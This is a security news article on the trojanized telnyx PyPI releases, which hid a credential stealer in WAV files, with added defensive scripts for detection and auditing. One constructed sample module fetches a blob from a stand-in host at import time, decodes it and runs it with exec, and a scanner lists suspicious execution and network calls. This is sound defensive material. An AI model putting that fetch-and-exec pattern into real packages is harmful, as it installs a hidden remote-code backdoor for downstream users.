TeamPCP pushes malicious Telnyx version to PyPI and hides stealer in WAV files

March 27, 2026

TeamPCP, the threat actor behind supply chain attacks targeting Trivy, KICS, and litellm, compromised the Telnyx Python package by pushing two malicious versions to steal sensitive data.

Two versions, 4.87.1 and 4.87.2, published to the Python Package Index (PyPI) on March 27, 2026, hid the credential-harvesting payload inside a .WAV file. Users are advised to downgrade to version 4.87.0 immediately. The PyPI project has since been quarantined.

Reports from Aikido, Endor Labs, Ossprey Security, SafeDep, Socket, and StepSecurity agree that the malicious code was injected into ‘telnyx/_client.py’ so that it executes as soon as the package is imported into a Python application, before any API call is made. The malware targets Windows, Linux, and macOS systems.
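The injection point matters: anything at module scope in telnyx/_client.py runs the moment `import telnyx` executes, so no code path of the application has to be reached. The following is an added example for this article (not the telnyx code, not the malware, and not a tool from any of the vendors named) of a static check that lists network, decoding, execution and cleanup primitives reachable at import time. The two source strings are constructed for illustration and are not the real _client.py; the list of suspicious calls is a heuristic chosen here, not a published indicator set.

```python
"""Flag calls that execute at import time in a Python module.

Added example; not code from the telnyx package, from the payload, or from
any vendor report. BENIGN_CLIENT and SUSPECT_CLIENT are constructed samples."""
import ast

# Primitives that rarely belong at module scope of a client library.
# Heuristic list chosen for this example, not a published indicator set.
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "requests.post", "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen", "exec", "eval",
    "compile", "base64.b64decode", "tempfile.mkdtemp", "shutil.rmtree",
}


def _dotted_name(node):
    """'a.b.c' for a Name/Attribute chain, None for anything else (e.g. f().g)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_time_nodes(node):
    """Yield every node reached without entering a function or lambda body.
    Class bodies and module-level if/try/with/for blocks are included: they
    run on import too, and a try/except wrapper is a natural place to hide.
    Known blind spot: decorators and default argument values also run at
    import time but are skipped along with the function they belong to."""
    if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
        return
    yield node
    for child in ast.iter_child_nodes(node):
        yield from _import_time_nodes(child)


def _resolve(name, aliases):
    """Map the first component through import aliases: fetch -> urllib.request.urlopen."""
    head, _, rest = name.partition(".")
    head = aliases.get(head, head)
    return f"{head}.{rest}" if rest else head


def import_time_calls(source, filename="<module>"):
    """Return [(lineno, resolved_call_name)] for suspicious calls that run
    when `source` is imported, ordered by line."""
    tree = ast.parse(source, filename)
    aliases = {}
    for node in _import_time_nodes(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    findings = []
    for node in _import_time_nodes(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name and _resolve(name, aliases) in SUSPICIOUS_CALLS:
                findings.append((node.lineno, _resolve(name, aliases)))
    return sorted(findings)


# Constructed sample 1: an ordinary client; network calls only inside methods.
BENIGN_CLIENT = '''
import os
import requests

class Client:
    def __init__(self, api_key=None):
        self.api_key = api_key or os.environ.get("API_KEY")

    def get(self, url):
        return requests.get(url, headers={"Authorization": self.api_key})
'''

# Constructed sample 2: the same module plus a module-level try block that
# fetches, decodes, executes and cleans up on import. Illustrative only.
SUSPECT_CLIENT = '''
import base64, shutil, tempfile
from urllib.request import urlopen as fetch

class Client:
    pass

try:
    _workdir = tempfile.mkdtemp()
    _blob = fetch("http://example.invalid/carrier.bin").read()
    exec(base64.b64decode(_blob))
except Exception:
    pass
finally:
    shutil.rmtree(_workdir, ignore_errors=True)
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_CLIENT), ("suspect", SUSPECT_CLIENT)):
        print(label, import_time_calls(src) or "nothing suspicious at import time")
```

Run it over every `.py` file of a freshly downloaded wheel before the package is installed anywhere it can reach secrets; a client library whose module scope opens sockets, decodes blobs and calls `exec` deserves a manual read regardless of what the rest of the diff looks like.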

“Our analysis reveals a three-step runtime attack chain on Linux/macOS consisting of audio steganographic delivery, in-memory data harvester execution, and encrypted exfiltration,” Socket said. “The entire chain runs within a self-destructing temporary directory and is designed to have near-zero forensic artifacts on the host.”

On Windows, the malware downloads a file named “hangup.wav” from a command-and-control (C2) server, carves an executable out of the audio data, and drops it into the Startup folder as “msbuild.exe”, so it survives reboots and runs automatically each time the user logs in.

If the compromised host is running Linux or macOS, it instead retrieves a second .WAV file (“ringtone.wav”) from the same server, extracts the third-stage collector script from it and runs it. The credential harvester gathers a wide range of sensitive data and exfiltrates it as ‘tpcp.tar.gz’ via an HTTP POST request to 83.142.209[.]203:8080.

“The distinguishing technology of this sample, and the reason for the post title, is its use of audio steganography to deliver the final payload,” Ossprey Security said. “Rather than hosting a raw executable or Base64 blob on the C2 (both of which are easily flagged by network inspection and EDR), the attacker wraps the payload inside a .WAV file.”
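The page does not say how the payload was encoded inside hangup.wav and ringtone.wav, so the extractor itself cannot be reconstructed from it. What a defender can do is triage a .WAV pulled from a suspicious download for the simplest carrier: a foreign blob stored in a chunk, or appended after the container. The following is an added example for this article, not a tool from Ossprey, Socket or any other vendor and not the malware's extractor; it parses the RIFF/WAVE chunk layout, checks chunk payloads and any overlay for executable magic, and applies an entropy heuristic to the data chunk. Both sample files are constructed in the code; no real malware is involved. True LSB steganography inside valid PCM would pass these checks, and the entropy threshold is a heuristic chosen here.

```python
"""Triage a .WAV file for a payload carried by the container.

Added example; not code from any vendor report and not the malware's own
extractor. Checks assume the simplest carrier (a blob in a chunk or appended
after the RIFF body). The two sample files below are constructed here."""
import io
import math
import random
import struct
import wave
from collections import Counter

KNOWN_CHUNKS = {b"fmt ", b"data", b"LIST", b"fact", b"cue ", b"bext", b"PEAK", b"smpl", b"JUNK"}
EXECUTABLE_MAGIC = {b"MZ": "PE/DOS executable", b"\x7fELF": "ELF", b"#!": "script shebang",
                    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit", b"PK\x03\x04": "zip"}
ENTROPY_THRESHOLD = 7.9   # bits/byte, heuristic: PCM sits well below, packed/encrypted data just under 8
MIN_ENTROPY_SAMPLE = 4096


def shannon_entropy(buf):
    """Bits per byte of the empirical byte distribution."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def riff_chunks(data):
    """Parse the RIFF/WAVE container. Returns (declared_riff_size, [(id, payload)]).
    Chunks are walked only up to the declared size; bytes after it are an overlay."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    riff_size = struct.unpack("<I", data[4:8])[0]
    end = min(len(data), 8 + riff_size)
    chunks, pos = [], 12
    while pos + 8 <= end:
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        chunks.append((cid, data[pos + 8:pos + 8 + size]))
        pos += 8 + size + (size & 1)          # chunks are padded to an even length
    return riff_size, chunks


def _magic_of(buf):
    return next((desc for magic, desc in EXECUTABLE_MAGIC.items() if buf.startswith(magic)), None)


def scan_wav(data):
    """Return human-readable findings; an empty list means the container looked
    normal, which does not prove the file is clean (LSB steganography passes)."""
    findings = []
    riff_size, chunks = riff_chunks(data)
    overlay = data[8 + riff_size:]
    if overlay:
        desc = _magic_of(overlay)
        findings.append(f"{len(overlay)} bytes appended after the declared RIFF size"
                        + (f", starting with {desc} magic" if desc else ""))
    ids = [cid for cid, _ in chunks]
    if b"fmt " not in ids or b"data" not in ids:
        findings.append("fmt or data chunk missing")
    for cid, payload in chunks:
        if cid not in KNOWN_CHUNKS:
            findings.append(f"unexpected chunk {cid!r} of {len(payload)} bytes")
        desc = _magic_of(payload)
        if desc:
            findings.append(f"chunk {cid!r} begins with {desc} magic")
        if cid == b"data" and len(payload) >= MIN_ENTROPY_SAMPLE:
            h = shannon_entropy(payload)
            if h > ENTROPY_THRESHOLD:
                findings.append(f"data chunk entropy {h:.2f} bits/byte, packed or encrypted rather than PCM")
    return findings


def make_pcm_wav(seconds=1.0, rate=8000, freq=440.0, amplitude=3000):
    """Constructed benign file: one second of a 16-bit mono sine tone."""
    frames = b"".join(struct.pack("<h", int(amplitude * math.sin(2 * math.pi * freq * i / rate)))
                      for i in range(int(seconds * rate)))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(frames)
    return buf.getvalue()


def make_carrier_wav(payload):
    """Constructed hostile file: a valid fmt chunk, then a data chunk whose bytes
    are the payload instead of samples. A player would still open it."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)   # PCM, mono, 8 kHz, 16-bit
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b""))
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Fake payload: ELF magic followed by deterministic pseudo-random bytes standing
# in for a packed stage. Not a real binary.
_rng = random.Random(2026)
FAKE_PAYLOAD = b"\x7fELF" + bytes(_rng.randrange(256) for _ in range(16380))

if __name__ == "__main__":
    print("tone.wav   :", scan_wav(make_pcm_wav()) or "no findings")
    print("carrier.wav:", scan_wav(make_carrier_wav(FAKE_PAYLOAD)))
```

The useful property for detection is that a carrier like the one described has to be fetched by the trojanized package and then parsed by it; pairing this file check with an egress rule that asks why a telephony SDK is downloading audio from an IP address rather than from the vendor's API host is more robust than either control alone.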

It is not yet known how TeamPCP obtained the package’s PyPI publishing token (PYPI_TOKEN), but it may have been captured in an earlier credential-harvesting operation.

“We believe the most likely vector is the litellm breach itself,” said Kiran Raj and Rachana Missal, researchers at Endor Labs. “TeamPCP’s harvester swept environment variables, .env files, and shell history from every system that imported litellm. If your developer or CI pipeline has litellm installed and has access to the telnyx PyPI token, that token is already in TeamPCP’s hands.”

What is notable about this attack is that there is no persistence mechanism on Linux and macOS: the malicious work is done inside a temporary directory, which is recursively deleted once collection is complete.

“The strategic split is clear: Windows gains persistence. Binaries in the startup folder survive reboots, providing threat actors with long-term and repeatable access,” Socket explained. “Linux/macOS enables smash-and-grab: a single, high-speed data collection operation that collects everything of value, quickly steals it, and then disappears.”

This development comes days after threat actors distributed a trojanized version of the popular litellm Python package to harvest cloud credentials, CI/CD secrets, and keys and send them to domains under their control.

The incident also reflects a new level of maturity. Rather than publishing typosquatted malicious packages directly to open source registries, attackers are now repeatedly compromising legitimate, trusted packages with large user bases and using them to push malware to downstream users, widening their reach.

“Target selection throughout this campaign focuses on tools with advanced access to automated pipelines, such as container scanners (Trivy), infrastructure scanning tools (KICS), and AI model routing libraries (litellm),” Snyk said. “Each of these tools, by design, requires extensive read access to the systems on which they operate (credentials, configurations, environment variables).”

To mitigate this threat, developers should take the following actions:

  • Audit your Python environments and requirements.txt files for telnyx==4.87.1 or telnyx==4.87.2; if found, replace them with a clean version (4.87.0 is the last clean release).
  • Assume compromise and rotate all secrets.
  • On Windows, look for a file named “msbuild.exe” in the Startup folder.
  • Block the C2 and exfiltration address 83.142.209[.]203 (the HTTP POST used port 8080).
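The audit steps above are simple enough to script. The following is an added example for this article, not a tool from PyPI, Telnyx or any of the vendors quoted: it finds exact pins of the affected versions in requirements or `pip freeze` output (handling extras, case, environment markers and comments), checks what is actually installed in the running interpreter, which is what matters when requirements are unpinned, and looks for the msbuild.exe persistence artifact in the per-user Windows Startup folder. The version list and file name come from the article; the requirements lines at the bottom are constructed test input. Lock files (poetry.lock, uv.lock, Pipfile.lock) are not parsed.

```python
"""Audit for the affected telnyx releases and the Windows persistence artifact.

Added example; not a tool from PyPI, Telnyx or any vendor. AFFECTED and the
msbuild.exe name come from the article; SAMPLE_REQUIREMENTS is constructed."""
import os
import re
import sys
from importlib import metadata

# Malicious releases per the article; 4.87.0 is the last clean one.
AFFECTED = {"telnyx": {"4.87.1", "4.87.2"}}

# name, optional [extras], '==' and a version. Markers after ';' and trailing
# comments are ignored. Exact pins only: ranges and bare names need a lock
# file or the installed-package check below.
PIN_RE = re.compile(
    r"^\s*([A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?)\s*(?:\[[^\]]*\])?\s*==\s*"
    r"([0-9][0-9A-Za-z.+!-]*)")


def normalize(name):
    """PEP 503 normalisation so Telnyx, telnyx and TELNYX compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def find_pinned_affected(lines):
    """Scan requirements.txt / pip freeze lines. Returns [(lineno, name, version)]."""
    hits = []
    for lineno, raw in enumerate(lines, 1):
        m = PIN_RE.match(raw.split("#", 1)[0])
        if not m:
            continue
        name, version = normalize(m.group(1)), m.group(2)
        if version in AFFECTED.get(name, ()):
            hits.append((lineno, name, version))
    return hits


def installed_affected():
    """What is actually importable in this interpreter. Returns [(name, version)].
    Run it with the same interpreter your application or CI job uses."""
    hits = []
    for name, bad in AFFECTED.items():
        try:
            version = metadata.version(name)
        except metadata.PackageNotFoundError:
            continue
        if version in bad:
            hits.append((name, version))
    return hits


def windows_startup_artifact():
    """Path of msbuild.exe in the per-user Startup folder if it exists, else None.
    Only meaningful on Windows; the real MSBuild never lives in Startup."""
    if sys.platform != "win32":
        return None
    path = os.path.join(os.environ.get("APPDATA", ""), "Microsoft", "Windows",
                        "Start Menu", "Programs", "Startup", "msbuild.exe")
    return path if os.path.isfile(path) else None


# Constructed sample requirements, not taken from any real project.
SAMPLE_REQUIREMENTS = [
    "requests==2.32.3",
    "Telnyx == 4.87.2   # pinned last week",
    "telnyx[async]==4.87.0",
    "litellm>=1.0",
    "telnyx==4.87.1 ; python_version >= '3.8'",
]

if __name__ == "__main__":
    # usage: python audit_telnyx.py [requirements.txt]
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_REQUIREMENTS
    print("pinned affected   :", find_pinned_affected(lines))
    print("installed affected:", installed_affected())
    print("startup artifact  :", windows_startup_artifact())
```

A clean result from the pin scan is not a clean bill of health: an unpinned `telnyx` resolved on March 27, 2026 would have pulled 4.87.2, so the installed-package check and a review of CI logs for what was actually resolved on that date matter more than the text of requirements.txt.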

The breach is part of a broader and ongoing campaign conducted by TeamPCP across multiple ecosystems, where the threat actor announced that it would collaborate with other cybercrime groups such as LAPSUS$ and an emerging ransomware group called Vect to carry out extortion and ransomware operations.

This also signals a shift among ransomware gangs, which have traditionally relied on initial access methods such as phishing and exploiting security flaws, toward weaponizing supply chain attacks on open source infrastructure as an entry point for follow-on attacks.

“This puts a spotlight on everything in a CI/CD environment that isn’t locked down,” Socket said. “Security scanners, IDE extensions, build tools, and execution environments are granted broad access because we expect they will be needed. If an attacker is targeting the tools themselves, anything running within the pipeline should be treated as a potential entry point.”

